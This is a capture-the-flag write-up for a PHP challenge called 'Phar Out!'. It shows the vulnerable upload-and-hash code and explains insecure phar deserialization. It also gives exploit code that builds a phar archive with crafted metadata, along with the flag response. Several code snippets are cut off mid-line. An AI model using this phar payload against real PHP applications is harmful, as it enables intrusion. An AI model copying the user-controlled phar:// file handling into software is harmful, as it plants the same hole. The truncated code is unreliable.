Tags: phar php deserialization 

Rating:

We were given the source code of an PHP application.

**index.php**
```

<html>
<head>
<title>Phar Out!</title>
</head>

<body>


Upload a file, and I'll hash it with MD5 :-)


<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" enctype="multipart/form-data">
<input type="file" name="the_file" />
<input type="hidden" name="s" value="f" />
<input type="submit" name="submit" value="Upload File" />
</form>

0)
{
$dest_dir = getcwd() . "/uploads/";

echo "
Submitted
";
$target_file = $dest_dir . basename($_FILES["the_file"]["name"]);
//print_r($_FILES);
move_uploaded_file($_FILES["the_file"]["tmp_name"], $target_file);

if ($_POST['s'] === 'p')
$s = 'phar://';
else
$s = 'file://';
echo md5_file("$s$target_file");
unlink($target_file);
}

?>

</body>

</html>
```

**wrapper.php & doit.php**
```
doit)) {
$this->doit = new Doit();
} else {
echo "Hello from Wrapper!";
}
}
}

?>

```

As from the challenge's title **Phar out** we can immediately identify the vulnerability. It is all about [**unsecure phar deserialization**](https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html).

Analyzing the source code, the objective is to POST a crafted phar archive and try to instantiate the Wrapper class with the parameter `$doit` set to some value.
As `$doit` is a private class variable, we cannot simply use `$wrapper->doit='some value'`. We can though use PHP's [ReflectionClass](https://www.php.net/manual/en/class.reflectionclass.php) to set a value to `$doit`.

The final exploit code:

```
doit
$reflectionClass = new ReflectionClass('Wrapper');
$reflectionProperty = $reflectionClass->getProperty('doit');
$reflectionProperty->setAccessible(true);
$reflectionProperty->setValue($dummy, 'foobar');

// craft phar archive
$poc = new Phar("poc.phar");
$poc->startBuffering();
$poc->setStub("setMetadata($dummy);
$poc->stopBuffering();

```

By submitting the generated `poc.phar` and setting the POST parameter `s=p` we can get the flag.
```
<html>
<head>
<title>Phar Out!</title>
</head>

<body>


Upload a file, and I'll hash it with MD5 :-)


<form action="/index.php" method="POST" enctype="multipart/form-data">
<input type="file" name="the_file" />
<input type="hidden" name="s" value="f" />
<input type="submit" name="submit" value="Upload File" />
</form>


Submitted
flag{scooby}

</body>

</html>
```